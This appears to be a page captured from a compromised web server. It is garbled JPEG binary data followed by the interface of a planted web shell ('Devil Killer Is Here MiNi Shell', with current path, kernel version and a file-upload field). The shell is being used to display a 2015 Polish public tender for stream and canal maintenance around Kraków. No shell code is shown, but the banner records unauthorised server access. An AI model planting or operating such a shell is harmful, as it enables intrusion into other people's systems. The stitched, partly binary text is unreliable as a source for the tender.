JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20150701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20150701/162030-N-2015.html

<p class="kh_header"><b>Kraków: Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia</b><br>
<b>Numer ogłoszenia: 162030 - 2015; data zamieszczenia: 01.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Małopolski Zarząd Melioracji i Urządzeń Wodnych Inspektorat Rejonowy w Krakowie , ul. Kraszewskiego 36, 30-110 Kraków, woj. małopolskie, tel. 12 628 09 80, faks 12 628 09 90.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mzmiuw.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi zlokalizowane na terenie działalności Inspektoratu Rejonowego w Krakowie woj.małopolskie zgodnie z poszczególnymi częściami zamówienia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część zamówienia nr 25 
Konserwacja potoku Rudno w km 0+880-0+900 - 0,02km uregulowany,         
m. Czernichów, gm. Czernichów
Zakres prac obejmuje: 
usunięcie zatoru  - roboty ziemne wykonane koparkami na odkład, gr.kat.III
roboty ziemne wykonane koparkami z transportem samochodami na odl.4km-dowóz ziemi 
na uzupełnienie ubytku w skarpach, gr.kat.III,
remont palisady wbitej na głębokość 1,5 z kołków o śr.12-14cm w gr.kat.III,

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).
Przed przystąpieniem  do prac należy skontrolować teren pod katem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.

Część zamówienia nr 26 
Konserwacja bieżąca na potoku Gnojski w km 0+500-2+100 t.j. 1,60km, nieuregulowany 
w m. Książnice i Cichawa, gm. Gdów, pow. Wieliczka

Zakres prac obejmuje: 
wycinka drzew piłą mechaniczną z wywiezieniem
wycinka zakrzaczeń
wykoszenie porostów ze skarp
usunięcie zatorów i przetamowań z gałęzi

W dniu planowanej wycinki, przed przystąpieniem  do prac należy dokonać oględzin drzew, pod kątem występowania na nim gniazd lęgowych . oględziny winny być prowadzone przez osobę pełniącą nadzór przyrodniczy-ornitologa.

Część zamówienia nr 27 
1.Konserwacja rz. Centara w km 10+400 - 12+200, ureg. w m. Łobzów, gm. Wolbrom, 
pow. olkuski 
Zakres prac obejmuje: 
Ręczne wykoszenie i wygrabienie porostów gęstych twardych ze skarp
Ręczne ścinanie i karczowanie krzaków - wycięcie odrostów faszyny wraz z oczyszczeniem terenu,
Usuniecie zatorów i przetamowań z koryta z wywiezieniem i zagospodarowaniem odpadów, usuniecie tamy bobrowej, 
Oczyszczenie przepustów,
Roboty ziemne: mechaniczne i ręczne - udrożnienie koryta, rozplanowanie urobku po udrożnieniu,

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).
Przed przystąpieniem  do prac należy skontrolować teren pod katem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.
2. Konserwacja pot. Szklarka w km 3+900 - 3+950, nieureg. w m. Szklary, gm. Jerzmanowice-Przeginia, pow. krakowski
Zakres prac obejmuje: 
Ścinanie 2 szt.drzew piłą mechaniczną, z wykorzystaniem sprzętu specjalistycznego zwyżka, bez ingerencji w koryto cieku

W dniu planowanej wycinki, przed przystąpieniem  do prac należy dokonać oględzin drzew, pod kątem występowania na nim gniazd lęgowych . oględziny winny być prowadzone przez osobę pełniącą nadzór przyrodniczy-ornitologa.

Część zamówienia nr 28 
Konserwacja potoku Kostrzeckiego uregulowany w km 0+000-6+100- miasto Kraków , gm. Kraków , pow. Kraków
Zakres prac obejmuje: 
wykoszenie z wygrabieniem porostów traw ze skarp -38465,00 m2 - km 0+000-6+100
wygrabienie skoszonych porostów -38465,00 m2 - km 0+000-6+100
odwóz poza obręb koryta rzeki- 8,90 mp
wycinka krzaków bez karczowania -0,213 ha - km 0+000-6+100
wywóz wyciętych gałęzi , przetamowań ,skoszonych porostów we własnym zakresie  poza obręb robót na odl. do 5 km - 9,73 mp
udrożnienie dna warstwą min.20 cm na odcinku cieku,  rozplantowanie urobku poza pasem rzeki -  4744,00 mb - 0+00-3+100 i 4+456-6+100
usuwanie przetamowań z koryta cieku - 0,86 m3 - km 0+000-6+100
roboty ziemne wykonywane koparkami z załadunkiem i wywozem urobku na odległość 10 km - wykop i odwóz osadzonego na dnie namułu z oczyszczalni ścieków      Skotniki - 1,20x0,20x1356= 325,44 m3     - 3+100-4+456 
wyzbieranie i wyzwóz  przetamowań , śmieci i innych odpadów poza obręb pasa rzecznego we własnym zakresie -3,2 m3- km 0+000-6+100

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).
Przed przystąpieniem  do prac należy skontrolować teren pod katem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.

Część zamówienia nr 29 
1,Konserwacja potoku IGOŁOMSKIEGO w km 0+000  ÷ 5+313 (uregulowany) w m. Złotniki, Igołomia, Zofipole, gm. Igołomia-Wawrzeńczyce.
 (Rozmiar 5,313 km)
Zakres prac obejmuje: -   
wykoszeniu roślinności wodnej składającej się w przeważającej części 
z roślinności gęstej na skarpach;
wygrabieniu ze skarp i, złożeniu w kopy wzdłuż krawędzi potoku.  wywiezieniu odpadów i resztek 
nieulegających szybkiej biodegradacji;
podcięciu porostów i roślinności korzeniącej się w dnie potoku oraz wydobycie darni korzeniowej i 
kożucha roślin pływających z wody poprzez hakowanie;
wycince odrostów drzew i krzewów; Posegregowanie gałęzi i innych odpadów. 
Likwidacja  przetamowań i usuniecie  odpadów do worków i złożenie w kilku miejscach celem wywiezienia na wysypisko.
udrożnieniu koryta poprzez wykopy i przekopy wykonywane z użyciem koparki podsiębiernej,
odspojenie  gruntu nawodnionego koparką ze złożeniem urobku na odkład poza górną krawędzią
wykopu, wyprofilowanie skarp i dna cieku Formowanie z grubsza dna i skarp kanału.
rozplantowaniu ziemi  po robotach wodno-inżynieryjnych wykonywanych z użyciem sprzętu
mechanicznego
Zmiana stanowiska roboczego po wykonaniu wymaganego profili.
wywiezieniu resztek roślinnych folii, drewna na wysypisko.
Wygrabienie pozostałości po karczowaniu -Usunięcie zatorów i przetamowań z gałęzi i innych
odpadów.
uporządkowanie terenu po zakończeniu prac.
2.Konserwacja kanału nr 2  w km 0+000  - 1+100 (1,1 km) w m. Złotniki, gm. Igołomia-Wawrzeńczyce- uregulowany
Zakres prac obejmuje: 
wykoszeniu roślinności wodnej składającej się w przeważającej części 
z roślinności gęstej na skarpach;
wygrabieniu ze skarp i, złożeniu w kopy wzdłuż krawędzi potoku.  wywiezieniu odpadów i resztek nieulegających szybkiej biodegradacji;
podcięciu porostów i roślinności korzeniącej się w dnie potoku oraz wydobycie darni korzeniowej i kożucha roślin pływających z wody poprzez hakowanie;
wycince odrostów drzew i krzewów; Posegregowanie gałęzi i innych odpadów.
udrożnieniu koryta poprzez wykopy i przekopy wykonywane z użyciem koparki podsiębiernej, odspojenie  gruntu nawodnionego koparką ze złożeniem urobku na odkład poza górną krawędzią wykopu, wyprofilowanie skarp i dna cieku Formowanie z grubsza dna i skarp kanału. rozplantowaniu ziemi  po robotach wodno-inżynieryjnych wykonywanych z użyciem sprzętu mechanicznego
Zmiana stanowiska roboczego po wykonaniu wymaganego profili
rozplantowanie jednostronne urobku po mechanicznym udrożnieniu cieku.
wywiezieniu resztek roślinnych folii, drewna na wysypisko.
uporządkowanie terenu po zakończeniu prac.
Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).
Przed przystąpieniem  do prac należy skontrolować teren pod katem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie.

Część zamówienia nr 30 
1.Konserwacja potoku Tropiszowskiego w km 2+400 ÷ 8+950 (6,550 km)
w m. Odwiśle, Igołomia, Tropiszów,  Zofipole, gm. Igołomia-Wawrzeńczyce- uregulowany 
Zakres prac obejmuje: 
wykoszeniu roślinności wodnej składającej się w przeważającej części 
z roślinności gęstej na skarpach;
wygrabieniu ze skarp i, złożeniu w kopy wzdłuż krawędzi potoku.  wywiezieniu odpadów i resztek nieulegających szybkiej biodegradacji;
podcięciu porostów i roślinności korzeniącej się w dnie potoku oraz wydobycie darni korzeniowej i kożucha roślin pływających z wody poprzez hakowanie;
wycince odrostów drzew i krzewów; Posegregowanie gałęzi i innych odpadów. 
udrożnieniu koryta poprzez wykopy i przekopy wykonywane z użyciem koparki podsiębiernej, odspojenie  gruntu nawodnionego koparką ze złożeniem urobku na odkład poza górną krawędzią wykopu, wyprofilowanie skarp i dna cieku Formowanie z grubsza dna i skarp kanału. rozplantowaniu ziemi  po robotach wodno-inżynieryjnych wykonywanych z użyciem sprzętu mechanicznego
Zmiana stanowiska roboczego po wykonaniu wymaganego profilu.
oczyszczenie przepustów poprzez wyciągniecie zanieczyszczeń i  nawodnionej ziemi.
wywiezieniu resztek roślinnych folii, drewna na wysypisko.
Wygrabienie pozostałości po karczowaniu -Usunięcie zatorów i przetamowań z gałęzi i innych odpadów.
uporządkowanie terenu po zakończeniu prac.
2. Konserwacja kanału nr 3  w km 0+000  ÷ 0+720 ( 0,72 km) w m. Koźlica, gm. Igołomia-Wawrzeńczyce- uregulowany

Zakres prac obejmuje: 
wykoszeniu roślinności wodnej składającej się w przeważającej części 
z roślinności gęstej na skarpach;
wygrabieniu ze skarp i, złożeniu w kopy wzdłuż krawędzi potoku.  wywiezieniu odpadów i resztek nieulegających szybkiej biodegradacji;
podcięciu porostów i roślinności korzeniącej się w dnie potoku oraz wydobycie darni korzeniowej i kożucha roślin pływających z wody poprzez hakowanie;
wycince odrostów drzew i krzewów; Posegregowanie gałęzi i innych odpadów.
udrożnieniu koryta poprzez wykopy i przekopy wykonywane z użyciem koparki podsiębiernej, odspojenie  gruntu nawodnionego koparką ze złożeniem urobku na odkład poza górną krawędzią wykopu, wyprofilowanie skarp i dna cieku Formowanie z grubsza dna i skarp kanału. rozplantowaniu ziemi  po robotach wodno-inżynieryjnych wykonywanych z użyciem sprzętu mechanicznego
Zmiana stanowiska roboczego po wykonaniu wymaganego profili
rozplantowanie jednostronne urobku po mechanicznym udrożnieniu cieku
wywiezieniu resztek roślinnych folii, drewna na wysypisko.
uporządkowanie terenu po zakończeniu prac.

Prace należy prowadzić z uwzględnieniem warunków podanych w decyzji RDOŚ (w załączeniu).Przed przystąpieniem  do prac należy skontrolować teren pod katem występowania roślin oraz zwierząt objętych ochrona gatunkową. 
Kontroli winien dokonać specjalista przyrodnik z doświadczeniem w pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich.
W związku z powyższym przed przystąpieniem do prac; należy sporządzić notatkę z rozpoznania terenu przez przyrodnika i przekazać ją do Inspektoratu Rejonowego w Krakowie..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.34.00.00-3, 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli ;
a.)1.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie budowy, remontu lub naprawy śluz wałowych o wartości co najmniej 20 000 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 25, / z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)2.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości co najmniej 15 000 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 26 /,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)3.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości co najmniej 25 000 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 27 /,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)3.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości co najmniej 48 000 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 28 /,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
a.)4.wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie , że wykonali co najmniej 2 prace w zakresie konserwacji, regulacji, usuwaniu szkód powodziowych w korycie rzek i potoków o wartości co najmniej 60 000 zł. każda ,odpowiadające swoim rodzajem pracom stanowiącym przedmiot /dotyczy części zamówienia Nr 29 ,Nr 30/,z podaniem ich wartości, przedmiotu, daty wykonania i podmiotów na rzecz których usługi zostały wykonane, oraz załączeniem dowodów ,czy zostały wykonane lub są wykonywane/świadczenia okresowe lub ciągłe/ należycie. 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten będzie spełniony przez Wykonawcę jeżeli wykażą ,że dysponują sprzętem i urządzeniami niezbędnymi do wykonania zamówienia a w szczególności; 
co najmniej 1 koparkę,1 samochód samowyładowczy lub1 ciągnik /dotyczy części zamówienia Nr 25,Nr 27,Nr 28,Nr 29,Nr 30/
co najmniej 1 piła /dotyczy części zamówienia Nr 26/ .Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli wykonawca wykaże ,że 
1. dysponują  osobami posiadającymi kwalifikacje zawodowe, doświadczenie , wykształcenie i uprawnienia  niezbędne do realizacji zamówienia w rozumieniu ustawy Prawo budowlane z dnia 7 lipca 1994 (tj. Dz. U. z 2013 r., poz. 1409 z późn. zm.) lub  odpowiadające im równoważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów lub odpowiednie kwalifikacje zawodowe uznane na zasadach określonych w przepisach odrębnych oraz ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (t.j. Dz.U. z 2013 r. poz.932) do kierowania robotami budowlanymi na stanowisku: 
kierownika budowy, który musi posiadać uprawnienia budowlane do kierowania robotami budowlanymi w  specjalności konstrukcyjno-budowlanej  w zakresie budowli melioracji wodnych lub budowli hydrotechnicznych.  
W przypadku wykonawców zagranicznych, zamawiający dopuścił równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 
394 ze zm.) 
2.dysponują osobą  specjalista przyrodnik z doświadczeniem pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich 
(dotyczy Części zamówienia Nr 25,Nr 26,Nr 28,Nr 29,Nr 30) 
3.dysponują osobą  specjalista przyrodnik-ornitologa z doświadczeniem pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania pod kątem występowania gniazd lęgowych (dotyczy Części zamówienia Nr 27) 
Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

